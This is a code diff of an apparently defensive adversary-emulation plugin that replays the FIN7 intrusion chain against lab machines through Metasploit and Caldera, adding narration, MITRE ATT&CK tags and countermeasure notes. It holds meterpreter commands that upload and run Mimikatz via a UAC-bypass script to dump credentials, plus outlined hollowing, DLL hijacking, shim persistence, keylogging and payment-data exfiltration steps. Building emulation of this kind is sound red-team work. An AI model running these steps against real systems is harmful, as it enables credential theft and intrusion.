@ -4,7 +4,7 @@
from plugins . base . attack import AttackPlugin
from plugins . base . attack import AttackPlugin
from app . interface_sfx import CommandlineColors
from app . interface_sfx import CommandlineColors
from app . metasploit import MSFVenom , Metasploit
from app . metasploit import MSFVenom , Metasploit Instant
import os
import os
import time
import time
@ -32,13 +32,29 @@ class FIN7Plugin(AttackPlugin):
if self . metasploit_1 :
if self . metasploit_1 :
return self . metasploit_1
return self . metasploit_1
self . metasploit_1 = Metasploit ( self . metasploit_password , attack_logger = self . attack_logger , attacker = self . attacker_machine_plugin , username = self . metasploit_user )
self . metasploit_1 = Metasploit Instant ( self . metasploit_password , attack_logger = self . attack_logger , attacker = self . attacker_machine_plugin , username = self . metasploit_user )
self . metasploit_1 . start_exploit_stub_for_external_payload ( payload = self . payload_type_1 )
self . metasploit_1 . start_exploit_stub_for_external_payload ( payload = self . payload_type_1 )
self . metasploit_1 . wait_for_session ( )
self . metasploit_1 . wait_for_session ( )
return self . metasploit_1
return self . metasploit_1
def step1 ( self ) :
def step1 ( self ) :
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 1 (target hotelmanager): Initial Breach { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 1 (target hotelmanager): Initial Breach { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 1 (target hotelmanager): Initial Breach \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* RTF with VB payload ( needs user interaction )
* playoad executed by mshta
* mshta build js payload
* mshta copies wscript . exe to ADB156 . exe
* winword . exe spawns verclsid . exe ( a normal tool that can download stuff , no idea yet what it is used for here )
* mshta uses taskschd . dll to create a task in 5 minutes
This is the initial attack step that requires user interaction . Maybe it is better to reproduce those steps separately . They seem to be quite standard for any Ransomware infection .
""" )
# TODOS: No idea if we can replicate that automated as those are manual tasks
# TODOS: No idea if we can replicate that automated as those are manual tasks
# RTF with VB payload (needs user interaction)
# RTF with VB payload (needs user interaction)
@ -52,6 +68,19 @@ class FIN7Plugin(AttackPlugin):
def step2 ( self ) :
def step2 ( self ) :
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 2 (target hotelmanager): Delayed Malware Execution { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 2 (target hotelmanager): Delayed Malware Execution { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 2 (target hotelmanager): Delayed Malware Execution \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* scheduled task spawns Adb156 . exe via svchost https : / / attack . mitre . org / techniques / T1053 / 005 /
* Adb156 . exe loads scrobj . dll and executes sql - rat . js via jscript https : / / attack . mitre . org / techniques / T1059 / 007 /
* Adb156 . exe connects via MSSQL to attacker server
* WMI quieries for network information and system information https : / / attack . mitre . org / techniques / T1016 / and https : / / attack . mitre . org / techniques / T1082 / ( Caldera ? )
In this simulation sql - rat . js communication will be replaced by Caldera communication .
""" )
# scheduled task spawns Adb156.exe via svchost https://attack.mitre.org/techniques/T1053/005/
# scheduled task spawns Adb156.exe via svchost https://attack.mitre.org/techniques/T1053/005/
# Adb156.exe loads scrobj.dll and executes sql-rat.js via jscript https://attack.mitre.org/techniques/T1059/007/
# Adb156.exe loads scrobj.dll and executes sql-rat.js via jscript https://attack.mitre.org/techniques/T1059/007/
@ -63,6 +92,7 @@ class FIN7Plugin(AttackPlugin):
def step3 ( self ) :
def step3 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 3 (target hotelmanager): Target Assessment { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 3 (target hotelmanager): Target Assessment { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration ( " Step 3 (target hotelmanager): Target Assessment \n ---------------------------- " )
# TODO: Make sure logging is nice and complete
# TODO: Make sure logging is nice and complete
@ -72,16 +102,29 @@ class FIN7Plugin(AttackPlugin):
# Execute net view from spawned cmd https://attack.mitre.org/techniques/T1135/
# Execute net view from spawned cmd https://attack.mitre.org/techniques/T1135/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } new view { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } new view { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " deeac480-5c2a-42b5-90bb-41675ee53c7e " , parameters = { " remote.host.fqdn " : hotelmanager . get_ip ( ) } )
self . caldera_attack ( hotelmanager ,
" deeac480-5c2a-42b5-90bb-41675ee53c7e " ,
parameters = { " remote.host.fqdn " : hotelmanager . get_ip ( ) } ,
tactics = " Discovery " ,
tactics_id = " TA0007 " ,
situation_description = " The attackers got a bastion system infected and start to evaluate the value of the network " )
# check for sandbox https://attack.mitre.org/techniques/T1497/
# check for sandbox https://attack.mitre.org/techniques/T1497/
# The documentation does not define how it is checking exactly.
# The documentation does not define how it is checking exactly.
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } get-wmiobject win32_computersystem | fl model { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } get-wmiobject win32_computersystem | fl model { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " 5dc841fd-28ad-40e2-b10e-fb007fe09e81 " )
self . caldera_attack ( hotelmanager ,
" 5dc841fd-28ad-40e2-b10e-fb007fe09e81 " ,
tactics = " Defense Evasion " ,
tactics_id = " TA0005 " ,
situation_description = " There are many more ways to identify if the attacker is running in a VM. This is just one. " )
# query username https://attack.mitre.org/techniques/T1033/
# query username https://attack.mitre.org/techniques/T1033/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } query USERNAME env { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } query USERNAME env { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " c0da588f-79f0-4263-8998-7496b1a40596 " )
self . caldera_attack ( hotelmanager ,
" c0da588f-79f0-4263-8998-7496b1a40596 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 "
)
# TODO: query computername https://attack.mitre.org/techniques/T1082/
# TODO: query computername https://attack.mitre.org/techniques/T1082/
# self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1)
# self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1)
@ -90,17 +133,27 @@ class FIN7Plugin(AttackPlugin):
# TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/
# TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/
# WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/
# WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Network configuration discovery. Original is some WMI, here we are using nbstat { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Network configuration discovery. Original is some WMI, here we are using nbstat { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " 14a21534-350f-4d83-9dd7-3c56b93a0c17 " )
self . caldera_attack ( hotelmanager ,
" 14a21534-350f-4d83-9dd7-3c56b93a0c17 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 " )
# System Info discovery https://attack.mitre.org/techniques/T1082/
# System Info discovery https://attack.mitre.org/techniques/T1082/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } System info discovery, as close as it gets { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } System info discovery, as close as it gets { CommandlineColors . ENDC } " ,
1 )
1 )
self . caldera_attack ( hotelmanager , " b6b105b9-41dc-490b-bc5c-80d699b82ce8 " )
self . caldera_attack ( hotelmanager ,
" b6b105b9-41dc-490b-bc5c-80d699b82ce8 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 " )
# CMD.exe->powershell.exe, start takeScreenshot.ps1 https://attack.mitre.org/techniques/T1113/
# CMD.exe->powershell.exe, start takeScreenshot.ps1 https://attack.mitre.org/techniques/T1113/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Take screenshot { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } Take screenshot { CommandlineColors . ENDC } " ,
1 )
1 )
self . caldera_attack ( hotelmanager , " 316251ed-6a28-4013-812b-ddf5b5b007f8 " )
self . caldera_attack ( hotelmanager ,
" 316251ed-6a28-4013-812b-ddf5b5b007f8 " ,
tactics = " Collection " ,
tactics_id = " TA0009 "
)
# TODO: Upload that via MSSQL transaction https://attack.mitre.org/techniques/T1041/
# TODO: Upload that via MSSQL transaction https://attack.mitre.org/techniques/T1041/
self . attack_logger . vprint (
self . attack_logger . vprint (
@ -168,7 +221,15 @@ class FIN7Plugin(AttackPlugin):
"""
"""
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 4 (target hotelmanager): Staging Interactive Toolkit { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 4 (target hotelmanager): Staging Interactive Toolkit { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 4 (target hotelmanager): Staging Interactive Toolkit \n ---------------------------- " )
self . attack_logger . start_narration ( """
In the original attack Babymetal payload is a dll . Currently we are using a simplification here ( directly calling a exe ) . The original steps are :
* Target already runs adb156 . exe . This one gets the shellcode over the network connection and decodes it .
* adb156 . exe executes cmd . exe which executes powershell . exe . It decodes embedded dll payload https : / / attack . mitre . org / techniques / T1059 / 003 / and https : / / attack . mitre . org / techniques / T1059 / 001 /
* Powershell cmdlet Invoke - Expression executes decoded dll https : / / attack . mitre . org / techniques / T1140 /
* The script invoke - Shellcode . ps1 loads shellcode into powershell . exe memory ( Allocate memory , copy shellcode , start thread ) ( received from C2 server ) https : / / attack . mitre . org / techniques / T1573 /
""" )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Create babymetal replacement { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } Create babymetal replacement { CommandlineColors . ENDC } " ,
1 )
1 )
@ -208,6 +269,8 @@ class FIN7Plugin(AttackPlugin):
def step5 ( self ) :
def step5 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 5 (target hotelmanager): Escalate Privileges { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 5 (target hotelmanager): Escalate Privileges { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 5 (target hotelmanager): Escalate Privileges \n ---------------------------- " )
hotelmanager = self . get_target_by_name ( " hotelmanager " )
hotelmanager = self . get_target_by_name ( " hotelmanager " )
@ -216,18 +279,27 @@ class FIN7Plugin(AttackPlugin):
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute ps -ax through meterpreter { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute ps -ax through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ " ps -ax " ] , hotelmanager ) )
print ( metasploit . ps_process_discovery ( hotelmanager ,
situation_description = " The processes found here are not directly used (terminated, infected, ...). This is just a basic discovery step. " ,
countermeasures = " None possible. This is a very standard behaviour. Could be interesting after some data on process behaviour got aggregated as additional info snippet. " )
)
# powershell: GetIpNetTable() does ARP entries https://attack.mitre.org/techniques/T1016/
# powershell: GetIpNetTable() does ARP entries https://attack.mitre.org/techniques/T1016/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Execute arp through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Execute arp through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ " arp " ] , hotelmanager ) )
# print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
print ( metasploit . arp_network_discovery ( hotelmanager ,
situation_description = " Ready for first network enumeration " ,
countermeasure = " Maybe detect direct arp access. Should be uncommon for normal tools. " ) )
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
# TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
itadmin = self . get_target_by_name ( " itadmin " ) . get_ip ( )
itadmin = self . get_target_by_name ( " itadmin " )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute nslookup through meterpreter { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute nslookup through meterpreter { CommandlineColors . ENDC } " , 1 )
cmd = f " execute -f nslookup.exe -H -i -a ' { itadmin } ' "
# cmd = f"execute -f nslookup.exe -H -i -a '{itadmin}'"
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager ) )
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager))
print ( metasploit . nslookup ( hotelmanager , itadmin ,
situation_description = " Looking up info on the next target, the machine itadmin " ) )
# Copy step 5 attack tools to attacker
# Copy step 5 attack tools to attacker
@ -239,26 +311,51 @@ class FIN7Plugin(AttackPlugin):
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " samcat.exe " ) , " samcat.exe " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " samcat.exe " ) , " samcat.exe " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " uac-samcats.ps1 " ) , " uac-samcats.ps1 " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " uac-samcats.ps1 " ) , " uac-samcats.ps1 " )
print ( metasploit . meterpreter_execute_on ( [ " ls " ] , hotelmanager , delay = 10 ) )
print ( metasploit . meterpreter_execute_on ( [ " ls " ] , hotelmanager , delay = 10 ) )
cmd = " upload samcat.exe ' samcat.exe ' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
print ( cmd )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Uploading mimikatz through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Uploading mimikatz through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager , delay = 10 ) )
# cmd = "upload samcat.exe 'samcat.exe' "
# print(cmd)
cmd = " upload uac-samcats.ps1 ' uac-samcats.ps1 ' "
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager, delay=10))
print ( metasploit . upload ( hotelmanager , " samcat.exe " , " samcat.exe " ,
situation_description = " Uploading Mimikatz " ,
countermeasure = " File detection " ) )
# cmd = "upload uac-samcats.ps1 'uac-samcats.ps1' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
print ( cmd )
# print(cmd )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Uploading UAC bypass script through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Uploading UAC bypass script through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager , delay = 10 ) )
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager, delay=10))
print ( metasploit . upload ( hotelmanager , " uac-samcats.ps1 " , " uac-samcats.ps1 " ,
delay = 10 ,
situation_description = " Uploading UAC bypass powershell script. This one will execute Mimikatz " ,
countermeasure = " File detection " ) )
# execute uac-samcats.ps1 This: spawns a powershell from powershell -> samcat.exe as high integrity process https://attack.mitre.org/techniques/T1548/002/
# execute uac-samcats.ps1 This: spawns a powershell from powershell -> samcat.exe as high integrity process https://attack.mitre.org/techniques/T1548/002/
execute_samcats = " execute -f powershell.exe -H -i -a ' -c ./uac-samcats.ps1 ' "
execute_samcats = " execute -f powershell.exe -H -i -a ' -c ./uac-samcats.ps1 ' "
print ( execute_samcats )
print ( execute_samcats )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Execute UAC bypass (and mimikatz) through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Execute UAC bypass (and mimikatz) through meterpreter { CommandlineColors . ENDC } " , 1 )
logid = self . attack_logger . start_metasploit_attack ( source = self . attacker_machine_plugin . get_ip ( ) ,
target = hotelmanager . get_ip ( ) ,
metasploit_command = execute_samcats ,
ttp = " T1003 " ,
name = " execute_mimikatz " ,
description = " Execute Mimikatz to access OS credentials " ,
tactics = " Credential Access " ,
tactics_id = " TA0006 " ,
situation_description = " Executing Mimikatz through UAC bypassing powershell " ,
countermeasure = " Behaviour detection "
)
print ( metasploit . meterpreter_execute_on ( [ execute_samcats ] , hotelmanager , delay = 20 ) )
print ( metasploit . meterpreter_execute_on ( [ execute_samcats ] , hotelmanager , delay = 20 ) )
self . attack_logger . stop_metasploit_attack ( source = self . attacker_machine_plugin . get_ip ( ) ,
target = hotelmanager . get_ip ( ) ,
metasploit_command = execute_samcats ,
ttp = " T1003 " ,
logid = logid )
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@ -325,7 +422,19 @@ class FIN7Plugin(AttackPlugin):
def step6 ( self ) :
def step6 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 6 (target hotelmanager -> itadmin): Expand Access { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 6 (target hotelmanager -> itadmin): Expand Access { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 6 (target hotelmanager and itadmin): Expand Access \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT
* powershell download : paexec . exe and hollow . exe https : / / attack . mitre . org / techniques / T1105 /
* spawn powershell through cmd
* We move to the itadmin host : Use password with paexec to move lateral to it admin host https : / / attack . mitre . org / techniques / T1021 / 002 /
* paexec starts temporary windows service and executes hollow . exe https : / / attack . mitre . org / techniques / T1021 / 002 /
* https : / / www . poweradmin . com / paexec /
* = > Lateral move to itadmin
* hollow . exe spawns svchost and unmaps memory image https : / / attack . mitre . org / techniques / T1055 / 012 /
* svchost starts data exchange
""" )
# This is meterpreter !
# This is meterpreter !
# powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
# powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
@ -375,6 +484,21 @@ class FIN7Plugin(AttackPlugin):
def step7 ( self ) :
def step7 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 7 on itadmin: Setup User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 7 on itadmin: Setup User Monitoring { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 7 (target itadmin): Setup User Monitoring \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED
* Start situation : Step 6 executed a meterpreter in hollow . exe We can fake that to be able to start with step 7 directly
* BOOSTWRITE does DLL Hijack within a propriteary piece of software ( Aloha Command Center )
* This is meterpreter !
* Emulating DLL hijacking functionality of BOOSTWRITE
* Create BOOSTWRITE meterpreter handler
* Create temporary HTTP server serving " B " as XOR Key
* hollow . exe meterpreter session dowloads BOOSTWRITE . dll to srrstr . dll https : / / attack . mitre . org / techniques / T1105 /
* cmd . exe spawns svchost . exe - > executes SystemPropertiesAdvanced . exe which executes srrstr . dll
* srrstr . dll spawns rundll32 . exe which communicates to metasploit . New shell !
""" )
# Start situation: Step 6 executed a meterpreter in hollow.exe We can fake that to be able to start with step 7 directly
# Start situation: Step 6 executed a meterpreter in hollow.exe We can fake that to be able to start with step 7 directly
# BOOSTWRITE does DLL Hijack within a propriteary piece of software (Aloha Command Center)
# BOOSTWRITE does DLL Hijack within a propriteary piece of software (Aloha Command Center)
@ -396,6 +520,18 @@ class FIN7Plugin(AttackPlugin):
def step8 ( self ) :
def step8 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 8 (target: itadmin as domain_admin): User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 8 (target: itadmin as domain_admin): User Monitoring { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 8 (target itadmin): User Monitoring \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . MAYBE DO THIS PARTIAL . KEYLOGGING NEEDS USER INTERACTION .
( Screen spying and keylogging are already implemented as standalone metasploit attacks . Use them )
* Meterpreter migrates to explorer . exe ( from svchost ) https : / / attack . mitre . org / techniques / T1055 /
* screenspy for screen capture https : / / attack . mitre . org / techniques / T1113 /
* migrate session to mstsc . exe https : / / attack . mitre . org / techniques / T1056 / 001 /
* deploy keylogger https : / / attack . mitre . org / techniques / T1056 / 001 /
* create a RDP session from itadmin - > accounting using stolen credentials
""" )
# This is meterpreter !
# This is meterpreter !
@ -405,6 +541,8 @@ class FIN7Plugin(AttackPlugin):
# deploy keylogger https://attack.mitre.org/techniques/T1056/001/
# deploy keylogger https://attack.mitre.org/techniques/T1056/001/
# create a RDP session from itadmin -> accounting using stolen credentials
# create a RDP session from itadmin -> accounting using stolen credentials
# TODO: Screen spying and keylogging are already implemented as standalone metasploit attacks. Use them
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKGREEN } End Step 8: User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKGREEN } End Step 8: User Monitoring { CommandlineColors . ENDC } " , 1 )
@ -461,6 +599,15 @@ class FIN7Plugin(AttackPlugin):
def step9 ( self ) :
def step9 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 9 (target: accounting): Setup Shim Persistence { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 9 (target: accounting): Setup Shim Persistence { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 9 (target accounting): Setup Shim Persistence \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* powershell . exe executes base64 encoded commands ( Caldera ? )
* Downloads dll329 . dll and sdbE376
* persistence : sdbinst . exe installs sdbE376 . tmp for application shimming https : / / attack . mitre . org / techniques / T1546 / 011 /
""" )
# This is meterpreter !
# This is meterpreter !
@ -524,6 +671,17 @@ class FIN7Plugin(AttackPlugin):
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 10 (target: accounting): Steal Payment Data { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 10 (target: accounting): Steal Payment Data { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 10 (target accounting): Steal Payment Data \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . NEEDS TARGET REBOOTING : NO IDEA IF ATTACKX CAN SUPPORT THAT
* Machine is rebooted
* shim dll329 . dll is activated https : / / attack . mitre . org / techniques / T1546 / 011 /
* AccountingIQ injects into SyncHost . exe , rundll32 . exe communicates to C2
* debug . exe ( pillowMint . exe ) is downloaded from C2 , does process discovery https : / / attack . mitre . org / techniques / T1105 /
* send 7 za . exe to target . Zip stolen data , exfiltrate
""" )
# This is meterpreter !
# This is meterpreter !
@ -576,15 +734,15 @@ class FIN7Plugin(AttackPlugin):
self . build_step10 ( ) # DONE
self . build_step10 ( ) # DONE
# self.step1( )
self . step1 ( )
# self.step2( )
self . step2 ( )
self . step3 ( ) # DONE and works
self . step3 ( ) # DONE and works
self . step4 ( ) # PARTIAL - with a hack. Needs compilation of babymetal: Needs a powershell to execute on the build system. And this one needs system access
self . step4 ( ) # PARTIAL - with a hack. Needs compilation of babymetal: Needs a powershell to execute on the build system. And this one needs system access
self . step5 ( ) # DONE and quite ok
self . step5 ( ) # DONE and quite ok
# self.step6() # Hollow.exe has to be generated
self . step6 ( ) # Hollow.exe has to be generated
# self.step7() # Will need compilation of an attack tool Boostwrite
self . step7 ( ) # Will need compilation of an attack tool Boostwrite
# self.step8() # Migration and credential collection, on itadmin
self . step8 ( ) # Migration and credential collection, on itadmin
# self.step9() # on accounting, shim persistence bin329.tmp needs to be generated
self . step9 ( ) # on accounting, shim persistence bin329.tmp needs to be generated
# self.step10() # on accounting, AccountingIQ.c needs compilation. But just once.
self . step10 ( ) # on accounting, AccountingIQ.c needs compilation. But just once.
return " "
return " "